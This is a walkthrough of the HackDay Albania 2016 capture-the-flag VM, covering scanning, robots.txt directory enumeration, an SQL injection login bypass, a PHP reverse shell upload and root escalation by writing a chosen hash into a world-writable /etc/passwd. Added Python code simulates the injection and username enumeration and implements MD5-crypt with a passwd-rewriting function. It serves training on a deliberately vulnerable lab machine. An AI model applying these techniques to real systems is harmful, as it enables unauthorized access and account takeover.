Albania

Information:
Name: HackDay Albania 2016
VM Creator: R-73eN
Time it took me: 10+ hours. I dropped this one in November and picked it back up today. I was having trouble getting into the MySQL database because of my shell. However, when I tried again, I had no issues.
Rating: 7/10
Recommend: Yep. This VM will help you understand the /etc/passwd file and what Linux uses as password hashes better. Also good for SQL injection.

root@kali:~# nmap 10.0.2.6 -A -p 0-9000
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
8008/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 26 disallowed entries (15 shown)
| /rkfpuzrahngvat/ /slgqvasbiohwbu/ /tmhrwbtcjpixcv/
| /vojtydvelrkzex/ /wpkuzewfmslafy/ /xqlvafxgntmbgz/ /yrmwbgyhouncha/
| /zsnxchzipvodib/ /atoydiajqwpejc/ /bupzejbkrxqfkd/ /cvqafkclsyrgle/
|_/unisxcudkqjydw/ /dwrbgldmtzshmf/ /exschmenuating/ /fytdinfovbujoh/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: HackDay Albania 2016
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8

If you fetch robots.txt, you will see 26 disallowed directories. Run wget http://10.0.2.6:8008/robots.txt.

I made a little bash script to run through the robots.txt directories. It pulls only the Disallow paths out of the file and prints the HTTP status code next to each one, so the directory that actually exists stands out:
$ for i in $(awk '/^Disallow:/ {print $2}' robots.txt); do curl -s -o /dev/null -w "%{http_code} $i\n" "http://192.168.0.5:8008$i"; done

You will find that http://192.168.0.5:8008/unisxcudkqjydw/vulnbank/client/login.php exists. There is MySQL injection on the login page: if you type ';# into the username field, the form still submits without an error. We need to find a valid username first; I will use Burp Suite for that. Note: we are using the # comment character because the standard -- comment doesn't work here. MySQL only treats -- as a comment when it is followed by a space, so jeff'-- lands in the query as username='jeff'--' AND ... and is not a comment at all, while # needs no trailing space.
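As an added illustration (my own example, not code from the VM or the original post), here is the bug class behind login.php and the response-length username enumeration from the Burp step that follows, simulated against an in-memory SQLite table. The users, the page templates and the function names are constructed for this example. SQLite does not understand MySQL's # comment, so the payload here is jeff'-- (dash, dash, space) where the walkthrough uses jeff';# against MySQL; the hardened query with bound parameters sits beside the vulnerable one.

```python
import sqlite3

# Constructed sample data standing in for the vulnbank users table.
# "jeff" is the name the walkthrough found; the rest are made up.
SAMPLE_USERS = [
    ("jeff", "s3cret-jeff"),
    ("alice", "alice-pw"),
]


def make_db():
    """In-memory SQLite database playing the role of the bank's MySQL backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)", SAMPLE_USERS
    )
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """The bug class in login.php: user input pasted straight into the SQL text.
    Returns the matched username or None.  A username of  jeff'--  turns the
    query into  ...WHERE username='jeff'-- ' AND password='...'  and the
    password check is commented away (MySQL would accept  jeff';#  as well)."""
    sql = "SELECT username FROM users WHERE username='%s' AND password='%s'" % (
        username,
        password,
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Same query with bound parameters: the quote in the payload is just data."""
    row = conn.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def render_page(user):
    """Stand-in for the HTML login.php returns; the logged-in page is longer."""
    if user is None:
        return "<html><body>Login failed</body></html>"
    return (
        "<html><body>Welcome %s<ul><li>Accounts</li><li>Upload</li></ul>"
        "</body></html>" % user
    )


def enumerate_users(conn, candidates):
    """What the Burp Intruder run does: submit  <name>'--  with a junk password
    for every candidate and flag the ones whose response length differs from
    the baseline failure page.  Those are the accounts that exist."""
    baseline = len(render_page(None))
    found = []
    for name in candidates:
        body = render_page(login_vulnerable(conn, name + "'-- ", "anything"))
        if len(body) != baseline:
            found.append(name)
    return found


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, "jeff'-- ", "wrong"))
    print("safe:      ", login_safe(db, "jeff'-- ", "wrong"))
    print("enumerated:", enumerate_users(db, ["admin", "jeff", "alice", "bob"]))
```

login_vulnerable returns jeff for the payload with any password, login_safe returns None for the same input, and enumerate_users flags every candidate whose page length differs from the failure page, which is exactly the signal the Burp comparison gives you.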


Based on the different response length, we can assume jeff is a valid username for this bank. Go back to the login page and enter jeff';# into the username box. That will log you in to jeff's customer page. Once logged in, upload a PHP reverse shell with the extension .jpg or .png. Navigate to /var/www/html/ and find the config.php file. It will look like this:

You're the www-data user. Do a quick python3 -c 'import pty; pty.spawn("/bin/bash")' to get a TTY. Let's check out the MySQL database.

I try three passwords for taviso. None of them work. We can assume taviso can sudo to root because he has a .sudo_as_admin_successful file in his home directory (Ubuntu creates it the first time a member of the admin or sudo group runs sudo successfully). Pretty much everything else is barren. Let's see what files are world-writable, since those are the ones www-data can change.
Run find / -perm -o+w | grep -v "sys" | grep -v "proc" | grep -v "dev". I wish I could find a script/better command; this picks up a lot of nonsense files we don't care about. Restricting it to regular files and pruning the pseudo-filesystems instead of grepping path names helps: find / -type f -perm -o+w -not -path '/proc/*' -not -path '/sys/*' -not -path '/dev/*' 2>/dev/null. Either way, we find that /etc/passwd is world-writable. All we have to do is put a password hash of our own in taviso's line and we're good to go!

I cat my own /etc/shadow and find that the SHA-512 crypt ($6$) hash for toor is
$6$sgQgqhwa$qJlHD/fD.tjPSINio1LOEASc4I7W5mgi3g7HYgveX.6Sie65N5z56k6KXDytPHe/W83vazu3hLKIuu9pCCy3U0
Replace the taviso line in /etc/passwd with:
taviso:$6$sgQgqhwa$qJlHD/fD.tjPSINio1LOEASc4I7W5mgi3g7HYgveX.6Sie65N5z56k6KXDytPHe/W83vazu3hLKIuu9pCCy3U0:1000:1000:Taviso,,,:/home/taviso:/bin/bash
The hash goes in the second field, where the x that tells the system to look in /etc/shadow normally sits; with a real hash there, the shadow entry is ignored for that account.
Do a su - taviso with the password toor, or ssh taviso@10.0.2.6. Then sudo -i and congrats, you're root!

Extras: 1. Wondering how to generate Linux password hashes? https://unix.stackexchange.com/questions/81240/manually-generate-password-for-etc-shadow. I used openssl passwd -1 password to get the hash $1$KiVu/dJJ$fmcN6KvvZrW9KPxznxJ1A. (the trailing period is part of the hash). I tested that for another user and it works perfectly. Note that -1 produces an MD5-crypt hash; on OpenSSL 1.1.1 or newer, openssl passwd -6 produces the SHA-512 form used above.
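As an added example (mine, not from the post or the VM), here is the whole /etc/passwd trick in pure Python: a from-scratch implementation of the $1$ MD5-crypt scheme that openssl passwd -1 produces, a verifier for it, and a function that swaps the hash into the second field of a user's passwd line. MD5-crypt is used because it is short enough to write out with hashlib alone; glibc still accepts $1$ hashes in passwd and shadow (the author's test with another user relies on that), but $6$ SHA-512 crypt is what a current Ubuntu generates. The passwd contents, user names and function names below are constructed for this example.

```python
import hashlib

# crypt(3)'s base64 alphabet (not the RFC 4648 one).
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

# Constructed sample /etc/passwd standing in for the one on the VM.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
taviso:x:1000:1000:Taviso,,,:/home/taviso:/bin/bash
"""


def _to64(value, count):
    """Emit `count` characters, low six bits first, as crypt(3) does."""
    out = ""
    for _ in range(count):
        out += ITOA64[value & 0x3F]
        value >>= 6
    return out


def md5crypt(password, salt):
    """FreeBSD/glibc $1$ MD5-crypt, the scheme behind `openssl passwd -1`.
    Salt is at most 8 characters; the 1000-round loop is part of the format."""
    pw = password.encode()
    salt = salt.encode()[:8]
    ctx = hashlib.md5(pw + b"$1$" + salt)
    alt = hashlib.md5(pw + salt + pw).digest()
    # Mix in MD5(pw+salt+pw), as many bytes as the password is long.
    pl = len(pw)
    while pl > 0:
        ctx.update(alt[: min(pl, 16)])
        pl -= 16
    # The "something really weird" step from the reference implementation.
    i = len(pw)
    while i:
        ctx.update(b"\0" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()
    for i in range(1000):
        c = hashlib.md5()
        c.update(pw if i & 1 else final)
        if i % 3:
            c.update(salt)
        if i % 7:
            c.update(pw)
        c.update(final if i & 1 else pw)
        final = c.digest()
    f = final
    enc = (
        _to64((f[0] << 16) | (f[6] << 8) | f[12], 4)
        + _to64((f[1] << 16) | (f[7] << 8) | f[13], 4)
        + _to64((f[2] << 16) | (f[8] << 8) | f[14], 4)
        + _to64((f[3] << 16) | (f[9] << 8) | f[15], 4)
        + _to64((f[4] << 16) | (f[10] << 8) | f[5], 4)
        + _to64(f[11], 2)
    )
    return "$1$" + salt.decode() + "$" + enc


def verify(password, hashed):
    """Check a password against a $1$ hash by recomputing it with the stored salt."""
    parts = hashed.split("$")
    if len(parts) != 4 or parts[1] != "1":
        raise ValueError("not a $1$ hash")
    return md5crypt(password, parts[2]) == hashed


def set_passwd_hash(passwd_text, user, hashed):
    """Rewrite the password field (field 2 of 7) of one user's /etc/passwd line.
    A real hash there replaces the 'x' that defers to /etc/shadow, so the
    shadow entry is no longer consulted for that account."""
    out = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and fields[0] == user:
            fields[1] = hashed
        out.append(":".join(fields))
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    h = md5crypt("password", "KiVu/dJJ")  # same salt the post used with openssl
    print(h)
    print(set_passwd_hash(SAMPLE_PASSWD, "taviso", h), end="")
```

Run the file and the taviso line comes out with the hash where the x was. If your Python still ships the crypt module (it was removed in 3.13), crypt.crypt("password", "$1$KiVu/dJJ$") is the libc reference to compare against before trusting a re-implementation on a live passwd file; for a real target you would rather feed set_passwd_hash a $6$ hash from openssl passwd -6 or from your own shadow file, as done above.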
